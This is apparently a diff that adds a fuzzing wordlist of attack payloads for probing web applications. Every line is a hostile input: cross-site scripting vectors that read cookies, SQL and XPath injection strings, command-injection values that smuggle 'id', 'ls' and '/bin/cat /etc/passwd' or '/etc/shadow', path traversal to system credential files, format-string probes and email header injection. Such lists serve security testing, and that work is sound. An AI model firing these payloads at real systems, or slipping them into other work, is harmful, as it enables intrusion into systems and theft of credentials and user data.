<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
|
357
|
+
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
358
|
+
<IMG DYNSRC="javascript:alert('XSS')">
|
359
|
+
<IMG LOWSRC="javascript:alert('XSS')">
|
360
|
+
<IMG SRC="  javascript:alert('XSS');">
|
361
|
+
<IMG SRC="jav ascript:alert('XSS');">
|
362
|
+
<IMG SRC="jav	ascript:alert('XSS');">
|
363
|
+
<IMG SRC="jav
ascript:alert('XSS');">
|
364
|
+
<IMG SRC="jav
ascript:alert('XSS');">
|
365
|
+
<IMG SRC="javascript:alert('XSS')"
|
366
|
+
<IMG SRC="javascript:alert('XSS');">
|
367
|
+
<IMG SRC=javascript:alert('XSS')>
|
368
|
+
<IMG SRC=javascript:alert('XSS')>
|
369
|
+
<IMG SRC=javascript:alert('XSS')>
|
370
|
+
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
371
|
+
<IMG SRC=`javascript:alert("'XSS'")`>
|
372
|
+
<IMG SRC=javascript:alert("XSS")>
|
373
|
+
<IMG SRC=javascript:alert('XSS')>
|
374
|
+
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
375
|
+
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
|
376
|
+
<IMG%20SRC='javasc ript:alert(document.cookie)'>
|
377
|
+
<IMG%20SRC='javascript:alert(document.cookie)'>
|
378
|
+
<foo></foo>
|
379
|
+
<name>','')); phpinfo(); exit;/*</name>
|
380
|
+
<script>alert("XSS")</script>
|
381
|
+
<script>alert(document.cookie)</script>
|
382
|
+
<xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
383
|
+
<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
|
384
|
+
<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
385
|
+
<xss><script>alert('XSS')</script></vulnerable>
|
386
|
+
<youremail>%0aBcc:<youremail>
|
387
|
+
<youremail>%0aCc:<youremail>
|
388
|
+
<youremail>%0d%0aBcc:<youremail>
|
389
|
+
<youremail>%0d%0aCc:<youremail>
|
390
|
+
=
|
391
|
+
='
|
392
|
+
=--
|
393
|
+
=;
|
394
|
+
>
|
395
|
+
?x=
|
396
|
+
?x="
|
397
|
+
?x=>
|
398
|
+
?x=|
|
399
|
+
@'
|
400
|
+
@'
|
401
|
+
@*
|
402
|
+
@variable
|
403
|
+
A
|
404
|
+
ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
|
405
|
+
FALSE
|
406
|
+
NULL
|
407
|
+
PRINT
|
408
|
+
PRINT @@variable
|
409
|
+
TRUE
|
410
|
+
XXXXX.%p
|
411
|
+
XXXXX`perl -e 'print ".%p" x 80'`
|
412
|
+
[']
|
413
|
+
[']
|
414
|
+
\
|
415
|
+
\";alert('XSS');//
|
416
|
+
\"blah
|
417
|
+
\'
|
418
|
+
\'
|
419
|
+
\..\..\..\..\..\..\..\..\..\..\etc\passwd
|
420
|
+
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
|
421
|
+
\..\..\..\..\..\..\..\..\..\..\etc\shadow
|
422
|
+
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
|
423
|
+
\0
|
424
|
+
\00
|
425
|
+
\00\00
|
426
|
+
\00\00\00
|
427
|
+
\0\0
|
428
|
+
\0\0\0
|
429
|
+
\\
|
430
|
+
\\'/bin/cat%20/etc/passwd\\'
|
431
|
+
\\'/bin/cat%20/etc/shadow\\'
|
432
|
+
\\/
|
433
|
+
\\\\*
|
434
|
+
\\\\?\\
|
435
|
+
\n/bin/ls -al\n
|
436
|
+
\n/usr/bin/id;
|
437
|
+
\n/usr/bin/id\n
|
438
|
+
\n/usr/bin/id|
|
439
|
+
\nid;
|
440
|
+
\nid\n
|
441
|
+
\nid|
|
442
|
+
\nnetstat -a%\n
|
443
|
+
\t
|
444
|
+
\u003C
|
445
|
+
\u003c
|
446
|
+
\x23
|
447
|
+
\x27
|
448
|
+
\x27UNION SELECT
|
449
|
+
\x27\x4F\x52 SELECT *
|
450
|
+
\x27\x6F\x72 SELECT *
|
451
|
+
\x3C
|
452
|
+
\x3D \x27
|
453
|
+
\x3D \x3B'
|
454
|
+
\x3c
|
455
|
+
^'
|
456
|
+
^'
|
457
|
+
`
|
458
|
+
`/usr/bin/id`
|
459
|
+
`dir`
|
460
|
+
`id`
|
461
|
+
`perl -e 'print ".%p" x 80'`%n
|
462
|
+
`ping 127.0.0.1`
|
463
|
+
a);/usr/bin/id
|
464
|
+
a);/usr/bin/id;
|
465
|
+
a);/usr/bin/id|
|
466
|
+
a);id
|
467
|
+
a);id;
|
468
|
+
a);id|
|
469
|
+
a)|/usr/bin/id
|
470
|
+
a)|/usr/bin/id;
|
471
|
+
a)|id
|
472
|
+
a)|id;
|
473
|
+
a;/usr/bin/id
|
474
|
+
a;/usr/bin/id;
|
475
|
+
a;/usr/bin/id|
|
476
|
+
a;id
|
477
|
+
a;id;
|
478
|
+
a;id|
|
479
|
+
http://<yourservername>/
|
480
|
+
id%00
|
481
|
+
id%00|
|
482
|
+
insert
|
483
|
+
like
|
484
|
+
limit
|
485
|
+
null
|
486
|
+
or
|
487
|
+
or 0=0 #
|
488
|
+
or 0=0 --
|
489
|
+
or 1=1--
|
490
|
+
or%201=1
|
491
|
+
or%201=1 --
|
492
|
+
response.write 111111
|
493
|
+
something%00html
|
494
|
+
update
|
495
|
+
x' or 1=1 or 'x'='y
|
496
|
+
x' or name()='username' or 'x'='y
|
497
|
+
xsstest
|
498
|
+
xsstest%00"<>'
|
499
|
+
{'}
|
500
|
+
|/usr/bin/id
|
501
|
+
|/usr/bin/id|
|
502
|
+
|id
|
503
|
+
|id;
|
504
|
+
|id|
|
505
|
+
|ls
|
506
|
+
|ls -la
|
507
|
+
|nid\n
|
508
|
+
|usr/bin/id\n
|
509
|
+
||
|
510
|
+
|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
|
511
|
+
||/usr/bin/id;
|
512
|
+
||/usr/bin/id|
|
513
|
+
}
|
514
|
+
|